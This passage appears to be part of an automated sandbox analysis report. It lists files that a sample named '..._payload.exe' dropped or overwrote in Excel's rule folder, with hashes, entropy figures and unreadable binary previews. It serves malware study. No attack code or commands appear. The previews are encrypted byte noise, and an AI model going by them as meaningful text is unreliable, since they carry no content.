                                                                                                                                                                      Preview:<?xml.2F..zX...D.:.x...x.d.......i.w..r..=.yO.. .^....M+.q.....A....G./$Zb.._1.e$.{...(}.<....^G.........m..i.=.p.b.HG..9...i..c...<......).b........*Q$....b.......#p...(..C...V..(.?c.q...,.V..hF...K,....V..b..(.......N\.s...x..a...S..L.T..ir.#u+.9..G,8..q..o......$..D1..O*H...t.....|.r$1...1..........G.4D.Q.2.j:p'...C...........b..,./.#N|V..j.....J......T..wD.B. .y...C.n..d?.....a.d..d..J.C*..a..a........Z5.5....I...&N..['....[u....X...!.c....J6.M}..IYze..<.@...a.,..<.#...v..k1.Y..|0.......2.*<b........v|G.].M....Q.H..U{...7...+.SxesGH.;A%=.... '...<>...`..)|%l..../.:.).n@{.a>......-...+../=..B..j.7..j9.a... M.y...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100125v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):843
                                                                                                                                                                      Entropy (8bit):7.732188643516964
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:cjs7Hz+OJS/6RPoh0181uQfLPP5yxO8LyMKePA+u2UVV+9VX0Nve9+XYtSUdNciD:IiXtEb1uQDnR8L5pUYkYoB2bD
                                                                                                                                                                      MD5:663241522119614CFBF2115851DCB5CB
                                                                                                                                                                      SHA1:DB5CA6F35FDC570B9A09B194D3F58EB2FB9C93B3
                                                                                                                                                                      SHA-256:E23B669280754FBFB9572D8477E5955732F1B6979247040AE1A03A40F8CC1DD6
                                                                                                                                                                      SHA-512:F2F486F314348590E6AE6BE819A0F346C96C6150D64048C60D3F4E3FC866D52CBDB7A1A904182C6D48867F21C864052192E8E2D0598CF9CBB7CA8723DE459F72
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlF.Ft.......Mj.R.?.~Ow.Z.C.VC(...8i.....S.....K.GM...D...E.4...d_$..@.%8..&.7b...?......[.Bs.n.XV.X...~iM.n.(....t.H.tX....#.7G.'f.%...}.X..4.....b.......qS."....Pz..../mvY.op.....Dm..sk......[...=.,.F.x..m}...j.9..4*..k.q.(._.5:.|.&.......{*...h...~3k*5.l..!l.2N..Y.}.}....T..q..w....x7Q....=....:.Vn..AkQ..d./. ...M....)9.q.....W...m....Os..n..k....?.m..T..G.....f....T#.....|.[.......dP......@c...Q.R..#.F..... .y..5{.|..Y..9...t]A...........zsL.).`..E.v..v.....h_.F%e...D.......!.)H.9E...|.;..]....B.{s..z..!h.6.i.48...e.<...0,j.#...|.. .-r<.$..Xta....r.....|..;....x6.WsU....t..^x...K..ne.*.C .Gsh.U.6..G...,.e....%.[......Ro.C....m?...4..M......J.'.......Z....?8.o.r....:..O)y.....v.(;.d.....s..n?)'..g...OmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100126v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):849
                                                                                                                                                                      Entropy (8bit):7.739933248296007
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:80R2OtR/Gfmjt/hcwsvmt9gBysjtZO82clil0rxdNp9vjhppk8PnOubFlP7+zrmq:tB/l3k8adtZjFZvjRk8Pn9izrmJ2bD
                                                                                                                                                                      MD5:009A7B847056903DBFAA71DC10C98C0F
                                                                                                                                                                      SHA1:BB7460868B9C24A43FE5F93A5BD36DE640F70258
                                                                                                                                                                      SHA-256:1963BE1D81A89A77EF74B1B3B040336A60F392683D3471C4AB57E8EFFCE8EE7F
                                                                                                                                                                      SHA-512:B1BF8E4B1F6D907286B4A3FC731273E5D3AF39E0D5AB9BBC3A6A66BC7FC4C8F0261B1449B1287919A11226D95BFB9F2FCD8F8ECE8ABCE79547DA5D360DFDDB88
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.q........%p.........f....=?y.-a.t...]b?.r..z.....E..!J.sj.T6........[<...9.[......>;{......D.......n...P~..B..v..bH..4k*....S...&\c...7.......=.~3...rFn.1$.k..J`y.B..w".#V..M.A....EIm.......<.19u.$KZ.`..q.R..._............#.rh...J43#X..rC[6t.w.&....P...[.D.z..:.+...&..<&.{B.P...!...~...5..(%.]..A.....b.WHb.Y...u.w:t.\}....-.~...1...^.].@....Y....+.*I.V7g)~nG.w......cP.Hg..I....'R..g....k...'.....E:o49,....i...Ar...!K..d..`5._...'.]`.j`.....L\.Z'........G:>....:h.r..y...{Z.D....W1..Q7.....X...;@.N...S...*.9.M.1.9k...b..'..\...D..&..g...c....qD.S.j.q.+..QR3*..K*4....E....*....j..S*...~a(.v.^..P.k.fB.7<+.....5..5.....X....d.3..Y.BQ8..x...k.J....T.kc.w..C.|..|:z...'.....=....u.9:...........(._.5l....[...&8.{W..6H.O..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100127v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):835
                                                                                                                                                                      Entropy (8bit):7.722064006483974
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Pi5TnNxEx0MkkMYhMn5kM1jVmhMkvPVikSQnkw2bD:2TjRXkM8Mn5H1jRwVnkjD
                                                                                                                                                                      MD5:0478EA7CCCE12D0072E87BC702EE2EAB
                                                                                                                                                                      SHA1:B3E1FAC2862348659DD0C2A881D58667FBB6D2DD
                                                                                                                                                                      SHA-256:D295EF3EE474441168DA8F3C64BEAE380CE92035925F3B19BA3C9825869E9C34
                                                                                                                                                                      SHA-512:808B59EF8E2D5FA20E759C4D6C572E00D02A8701BB9B0F982C84012D7881C84A7606D8A9F6D3F23B1884639E5B9939A314A305F5A85786D3AD20796C74181FE7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........z..A....W.O...tuK..D....Xj..... ... m:B...-L....x3....]_..H../...f|D4...e....K .s.h..EN..F....8.&:..^..L.i!]...vpM....T....S.m...W...4H...,.....R.@m...8R.... .^..AQ.%.6.-.i.[.A#..&9.~@%`.(.(..g..X..^.yg...pY/A.7..).....v....n];a....2...0..3\...+.~YE..%\.F....MY".p......J.....B.8h...!...x.UB"a..".fJ}..j..GK.i..U.W]I....W.b.G.._.8.X..0\.D.Q...Zj.]M..a......#-7........TR...!\!..8..]....o[......b.<.....F..=..Q.f... ..Xcs.M...P<[..Jnk.&..ADS.T.N......a-..~}.HT.<.0#y...l.....(./.4T9....OJ....&..h..C#..p..#..A.."]&V8.....l.....4.aH.%....}... S#...U.6.,.3.du.a.....[Q.fX.JS..>B.lx.O...z.F....Z.;.L.oe&9.Q.......e..mo....n..6.........8XpCG.a........->8..d..n.T.#.......p.f9...:.t.k@+...E.p;.d..Q.6..I.)?.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100128v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.728684512726356
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:seOgb2h+qxLkaeeHQdDsc0vbNHw2oQ6AEuTdL38nYn3GpWx1PCVZ2ho5FSUdNciD:3OLHeeHQ9sTbNHwCdEcdLPn26VC2qK2X
                                                                                                                                                                      MD5:F7E3EDCD373E890FBB737F2D3D02618D
                                                                                                                                                                      SHA1:382DFDB5FA60BB80D9731191D7E5B8BBC934ABC8
                                                                                                                                                                      SHA-256:D26BCA85A81CC3F89346E91FF684A29F2CB17FFC22A7DFA459BDA722D9CA6799
                                                                                                                                                                      SHA-512:3FB9280E6F04833173C7DB8423E73109C40699241D8455545E46D557EA6E5C00C82C113351F13B01E76DFFC61916D7C870196FD4612396F8455C29D97D39E274
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.0<W`..(."..,.{..'.zw}....m....^.....w...8...W%.bH....O.^A=.DP.@..`.". u..c.3.,~.....2n..".0...A.(T.......HBQ.".=..^j.T..Y..B.b.%y..Dc."..v}j.%|2DZ.=....<.2.........._..S-....s..G....*..9.Pi......Q$..|..4..8......ro...F.o..p...n...............B/.u.........Q.#.vlC...tv.n.D.fY.rX+...h.,...:...1..........&...YRy@#J".+.,.V~+..V........E.....#..).h..Y..)..Y]..|L..7.@(..+.R.U".{....&.....T5.\*...Z.=F.......r+......_8..O.%/.0...p.^.N.d.f.....o.O...Z..E`V......v......)....6S....c..d.i....T^x2vG.=.<8._@K......EP..fC}?<.Z.Z..tt.bGmz<?......_..$qz....&.J,..s...\..3....c....H*.`...3.a...X.$...N9...L.J....v8.T.L..>....j..cZ"-X..d...}./.vf.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100129v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.728988111731459
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:Jp/sC6NPrPrULEtVObzb9capvaJ6cljHHG/X2WSUdNcii9a:Jp/J6NE4KbnpDcBD2bD
                                                                                                                                                                      MD5:EBC9FAC95CE177680312078C949B7492
                                                                                                                                                                      SHA1:125E9FC1BB653729899689DF21294CCA3286208D
                                                                                                                                                                      SHA-256:AC0499D71BC5825BD3379A6CFDE496BDE4EBF6590F6151F4AB9CA7F6E9B02177
                                                                                                                                                                      SHA-512:1EB7A1447C2668DC89426B889F15B800A1AA6089ED79E01A82D4445548609B83C9905AC716C6927AA99B5C533470A4E8BA96982DE7543D38DC9D2ECC96FFC4AE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.c0. h...Q.<..*...U.......?...?.L_...a.}82_...!7..R..B......{......S...>....O... .u..o.8.8N...U./M.(<.8D..lzu..\\...2.m...|.7..eK7.......-.t.H.. E...i...G.......w...RC..:.X.....d/lv.....J...G..Q.....j...-.-...9. .......qX.S.d.:.H..k..VKD.$.l.DEK&....Gg9..}.....4g........5.1.o......S...A~7..@..[U.N........._..}r.O..4..r.P.r.W...+..T.....?q..t/...~V....G...(O..,\.....xI..B...w...!....E).o.j|..}.FU}...J.....//.....Y.Z..gB..#.&O..]..2.......?.c~^".y.$\..Pl..{.0.y...w..(...m}.8g-.c..d.K.....NL.n....9...m.X....f.!K..'.<.H..L.g....R.J=..N.....R...n.;.R..YK:5.w.......m.c..U..7%..O.E..o.(.......N.M-:.m^v.G.s.4m.....C-`b.....0..*.:b.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100130v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):819
                                                                                                                                                                      Entropy (8bit):7.7597767717203165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qPVO6b6V1WmiMQ7UsvSa4yr8EscynRiWc4++8q5FFoH4iP+In+6Ay6I9gAoWSUdV:Gb0NFyrSRtlt5FF3iopu+2bD
                                                                                                                                                                      MD5:8086A41BF3BD488920A7BC442604CE03
                                                                                                                                                                      SHA1:ED6F9EFFE9004DE906E449CDA46105203821DFC3
                                                                                                                                                                      SHA-256:F5A449E30C7DAC925A1166A202DDB282385B3AFC65486D7C8196E8E555BEF873
                                                                                                                                                                      SHA-512:537C0F1475DDA442A9D684F008302C005A3C0F48370D864F47293D9684A2FDC6A0C53F470484972736FAB0C89382327A0A08345051718A9828D1B4B2B0C57C3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....I+F.f.iH.............i...o..,(t.p...d]&.T....J5..._..k.\g7..... ....(..s...Sz.+.B.}I...jp".%...9..1...Jo.K...l..E...@...:KG'/O.x....g...W....jn/.2..h{..g....|u\9F.L.Y@J......M......[.J.......U..1.b..Y+.P ...TfJQt.P.....DW.(}i....*....Fe.K...c...K.F.l...N;X.:.c.^KO.z.u.......n.kjRs..I4.....1@..,......q.~.3....=.......k.2....d.....B'.....+.#..E....,..i...3.S9....../|.....z....r......jEN.....m...4].B.....,.U.../..3rL%gG.u.@.T...J.$.yF..l.\....6...@....^.\....T.IEl.@.,...d.3..\...w........wM..];s.)..@.w.j......;i4.....s...'/..:.V:8............A...c.._...%.YX..5......KI&.ve...g...GC...Y.......VaN..?U..I.%...>.....4.|.......,Q.Y+v[cE....._.]A......S.. 99..O.Q.<.....0..)..........."..4mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100131v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                      Entropy (8bit):7.680083616071355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:wQw1IkXSIypCeHWGipL5j+ix0P8de6nlqZwL1G+cRnYsP3PAdiftOZZSUdNcii9a:8ZSXpCmWGKNiI0Y9sZa4xys3AsFOZs2X
                                                                                                                                                                      MD5:CE06935155545F01863E036A9CC7637F
                                                                                                                                                                      SHA1:20A54B2F883C6CDC9319E98DF9740870ABB4ABE3
                                                                                                                                                                      SHA-256:8F3206C476CA8388604295AA15351AE54412ACB14074E865F3C9EB6C75191FD8
                                                                                                                                                                      SHA-512:DCCDD61392503C0163267DA349F91B83C5DC5131BB74AC3692661B773E2AEA63378176A947A75AC261C897D5B8F5E4C06B217061B8D38B9A0BC969F4C1617811
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml8..X...&..}.Y.+.'e.K..(.\.3.@...36.7..*.r."..q3R.PK..i.w9r..q.u.3......NU\T....?.<...\t.h...h.N...>[S5..9I8.w.x...}....R.l.....C.\.B....G).;K/..M9........A.a.]....h).]........=..C.E..*.V.P....$........U~..A0...!@..*Y...R...GLP..lS.\.X:..../a..dC6c.:\....>...6oj..qW/............(..~)>:.,.$@6y...P.....Xd.P...m...../..,..J<...`".(.....y..u.1I.....Y.`T..8K?....t.?%...dQ.K..z....}=...F b..-.=.......fJ....>...;.....4.U..>p.^K....w(.N.Lb..o.74z....|...r.......nX.dA...X..]......6v.D...6.M.se}..6j...{q.5"...{.F.D.}.e4.L..Z.6/.pKW..i...;]...y{$`..s..~..~..x_...Yp{.R1.j.d|.R...L........7"....9....>..%.R.. GR....b.t..J..`..h.y.[H.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100132v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):764
                                                                                                                                                                      Entropy (8bit):7.742308491162609
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:K/THSxQ5SmEIcN/04VdB6KqqeLeU2Exr+e9i4m72wwD3Lohx/tNLYu4YFSUdNciD:UTHSmVqzVdz7U2Exr+e9LwwzLyfNUHYX
                                                                                                                                                                      MD5:803F84A1BAC81EE1951668844E03A881
                                                                                                                                                                      SHA1:BE8747A7775D34CD5E004ACA6C6467E976EB9249
                                                                                                                                                                      SHA-256:C9FCE23D10CF2B75CEFC282FA625BA005D2CCD9E7C25AF77F44BBA10F95981BB
                                                                                                                                                                      SHA-512:880127F38D312941FE4805E1CA177757451DB8AB4D1F57B8F0D8D62CD9FC8EF885BD49B05E91EDCAAC0C1E2E0080D5A8DD8F3793DB1EAF6075AFDBBFFD5CB2FE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.d..|...NCR.........R..O...L....^f)2.w..)d.j....;.....;...^.A.". _...0.\b....#..[.nlH..m=..U...<6..%.7)..Z..nA..(..RE'Wi.:...]....v.....#N.#.............\jql.z3....<.5...:V......a..l.........../.4b+..p;.....nw..y....7..g-.so.)mk>..t|..., W..%sN..BW..).w-..}X.Pf....U...c..*..h.....@.4.........s...&..o....*...M....].@...,<.L..0....2.r..p.O.PC...2...$..t..YY.X....1&Y.._q.+q....@.......'Y.....k....?.z..p..-.6.p#......`....i...-..y..7.)..^..mI.e.J.V..~.........c..P...;Cpx],\..!.~$..1(.@.YSG.i{Yy....o......i...<,J...%.vh$...Z.;....h.<...d.f.......(".^...ayHW....U.r..9 .J|.LDy5FW1.Jf_.].3...%.l..K.I......:.H....V..Qz.wq...........60..|mamMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100133v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):751
                                                                                                                                                                      Entropy (8bit):7.709596107804295
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:0yv9tFfvxrSVSb1s3e+4GCtIKAZaWni74znSSOBTnH2BN1eh//vqWSUdNcii9a:0yltFfEVSb6e5GRKAkWNznFOBTnAN1Wf
                                                                                                                                                                      MD5:94359261A09FD846540FA13179CAE877
                                                                                                                                                                      SHA1:001D818E15FE7C34FECE3C0DDDDC2DF27A8276E2
                                                                                                                                                                      SHA-256:A16230B53B5E2E92D35C6FA3C88A9A50D4B8B48C44577A13807D11F15EAB81E2
                                                                                                                                                                      SHA-512:05E0DA52FB3F821D5A139971B2DF7EE405EEED3F50787EAB074861AABAF0AA513707FC97E85977616BC90348D0EB50F544229DF6195D11451E412EFDD65AA3DB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml{.:.>..>.X...Q`P:.h....<...1..5.l!?.dR.\.....f...k.E)..D{P.?.v."b.L.bjAA.n.q.G=.a.Q..#].@..uY..........C=B......}.......`.1...{...]&.|.....k......=9u.f{G#.......C:..v..b...-..N.M=A.....o.0..p..o....N)...E .k5np.c....G.0. N&0r..i..*..^$`l.|......:.D%.N7../.mv....\....#...4Tx..q..Ug.f...I7hK.X;..k.]w......e.....L..DM?$.x...U.n.....?s..".W..@H..P...M..lM.^r.q...0......k. .\..<..b.Q9.._U..../....2....Z..KG4a.>p......2v....P&.=...6?.......&U&...."...g..b)<...g.|...j...q...P.H_.$.........T,#..XP.....B.....<..w.....0@.\..."rb..nS..aL3.-..1S....T..cP..-.K...LZ.;...<...G........xE.xgDX.N@s1.YU....9...ex<.~Vs^g.).*.{..P>...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100134v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):752
                                                                                                                                                                      Entropy (8bit):7.667283050769902
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:qekQJFBlCU4UmuuQTwn06DrFkBnSAx/jTu+mcoZ3juB627KWSUdNcii9a:qekQzjCUsuuQx6dkYAxu+mFZTepKV2bD
                                                                                                                                                                      MD5:839057A7386EC1F045F0A29F656E7693
                                                                                                                                                                      SHA1:5E59A12848DF358B1B78E8B6284E2B49ACC75F47
                                                                                                                                                                      SHA-256:F2A037509A6253B2880064885E506F79C4253051E09EC14EC1392BFEFF2FCB03
                                                                                                                                                                      SHA-512:CA977DACC07B3B7508BB1EDC194A7EE4B2A810F6007C6EA5491EED0C0E16F2E32B518EF8CEB11D595CFB50BEF8182CD32148473D98356F62BDAD2F32A54CD682
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml#.8P.K=A.........f/..<.{..R......R#.I.!.'..S-.5..4.gi..u....9..(T.."..4.?pu...5q~.)...........L0..,Nz..O..a...'1K...{rf.*.1$H.].^!...I..g.4>....Iw......|.Q...x.y7/c....^....h..H.R.H......8...s........-=b..!THu#.4hCQs... S1C.k...YT.v...}L/.o.n...>n..;w....B...z.S........ WR......yoK..M@A...(<..\.Ke..9.MQ.`$:.\'<.i...2.h../.P9RFD..|..L........P.=....g~qb.T-.....K*.eUP...Kp..].$t*.;OzkcM....<..IP'......f.z.......".$6..|..>.).F.7 .R.N....=1...W.....TK7..V...~..+(.5..........N.......I.+.$..e.9.N...4Sd.f.G@.I%...0.lqV.OW9Q..l'.K...)..v_...........y2.....W,WV.!k.l%_."...2.O8.+-..#./.g.K&%..n..,.~K2...#$(PH..%:.......Q..1..up* .z..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100201v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):743
                                                                                                                                                                      Entropy (8bit):7.685004427324188
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:pTQGlG4u7be0AdT9BrENVxEAMI9rctxD9yN6J0oALsTYfKzs0rsn3ANvf1lmfSUn:psVN7dAdTXeVxEAP2txD9yRoh9sOsGm5
                                                                                                                                                                      MD5:A7955DC70B3C70DB522BCE2AC3652B4A
                                                                                                                                                                      SHA1:7D92ABBFFB32094E1A78C98140A509A356B5CA6E
                                                                                                                                                                      SHA-256:8A21616E728E5262D96C888CC34244765B9F704732F97332B67626FDE33365DC
                                                                                                                                                                      SHA-512:B2CECD3092D4B73DCD7EF8E529DA18414301D314EC215A7DFB41539F9D177A3A8A0A4AD518EDBAC441EEE635E9F6B64E09DA29C0B23E55E3A42F0D63F6BED9E2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.'.%.Y.z.+...}...G..an.....#.h?.A..@v...v.>s..*x..,.......E.p8.9..b~.....?%t.a.!.]:m...N;.>grBJ}n[_..'v#....5&.p.D...O<l.v4{I.,....s.J.y~oPL.O,.KjZl_Dg.P,.X......A...>......j....7..i........].n. .....5.%.iD.k".%....X.g....zV...Y."l?..b...Ah..wazs..K.#C.V...;..8.?..P...........9..rte....3..u.#a.....4.3T..._~....'.JC...6X99..4M.l...iA.5.L...0......z.`b;..&...w....XI.j4.L^A."5x ekE....*.5.. .........G..w=..x....No6.u'>.dU.s{n.ReD..?...... .....E.....Fup......*2%...Lq..C.)..b1..R..n.....%...X.3.4%.(<E.rYb..U...T..._k!.z.c._.n....}..`C.&..|..&S7,V.....w.#...!.[`\.$...c~.q=..w..~p....T..a..y1.X.z.....D..}......`.xv.W_..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule100202v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):929
                                                                                                                                                                      Entropy (8bit):7.785615361466642
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:aGAG55FmrBvnEiL1FatTr0G3/b2ciRycn2gHZW/ZV2bD:a5GQrREiFIZi8q2AZ3D
                                                                                                                                                                      MD5:D69AD98F38D64FFCFC1C3BCC9A145AB0
                                                                                                                                                                      SHA1:3564EFABF529FAF114F0DE8B64CE1246DDE20859
                                                                                                                                                                      SHA-256:50FDDF2CFF858864DD11A2D3498417C35ECBB7CCC0F797489E85023366045CB1
                                                                                                                                                                      SHA-512:D2E26594A17F464EE7DEA9A2BC6B3EE525B825F7B8876030E369165A32991FF2A8D177A5F932DA94C15BD0A7EF23B60665C85728859A0A31188F44C6B3D4DD04
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlC.O.m.M....9.:..qy>....W^FZ$x...i..\....4...yG^,n.W[...|.N6HR...........<...(.!.;..m>z..O.J6.y.e.!..V..$/.....)..u.KjY(MaE.0...f.Vq......WM ..~.r......_.W.ql4..o..d:....).4./.y.q+.-D...Fs........,GQ..F.#.\...<.L..y]...........L.!..7...0%.)...F&\$<.$.a.~..U..SO.J.....bBdj.l.t.|..x.q.X./`Af... .....G/...(.Z@2..'..z:..%..*..,.Y.Z...h..H.kIn....0.IE.Ty..8..~....2r....R.|..-...b$..AY#.........A.......ZnZ..8..<#v.....N......_y%I....f."...d.`Nfv.pa.\...=.n.Kv.c..>|g......N...77...dz...K&.F_.z_J|..6.*.RT..K.5.j..c.n..9#.=.G......VV.sE......%.h4.e...X?.. .(..FgM.n..Z.Dy.|.t..](W...\.O..i..}0+(.=......'..aM.g....%GR.....V.^.6..'..v.*I..H.....6E..5..w..{..3.o.g..../x..&...1I....8..e.Y...i.>.-...K=.&...hB..{.......L.w[.&...(.j....k...._.._d.S..}.x....6..R.)....*.V.f.....x_K......C..%x....'...tZ.[.C..&.w.]Hv ...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10450v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1387
                                                                                                                                                                      Entropy (8bit):7.865826748495944
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:WG7nSUmVkWvprxkpqSRoif61ImlacPmjO3YTYHDczw7HtQkI3jof/2AS2FTKDHKL:B7nSyWvpr5if61jfmWYIGI2h3j2A2bD
                                                                                                                                                                      MD5:9A1865ED99A516A759AC8374D9E211B0
                                                                                                                                                                      SHA1:03D8C515DEF95066EA626B23BC40A99EE8629C27
                                                                                                                                                                      SHA-256:67020A4F4B71B557776B760F1645A755CD5044905776A280C390C0A8BE9E2FE4
                                                                                                                                                                      SHA-512:D9F22F98881E0585EB8DFA4E502B476EFCCC855312387ECC4EC7378650FF92538252A60464CC62D8B9A712C14C22D5BA512EEE3DD13669D7765195286A38B6AD
                                                                                                                                                                      Malicious:false
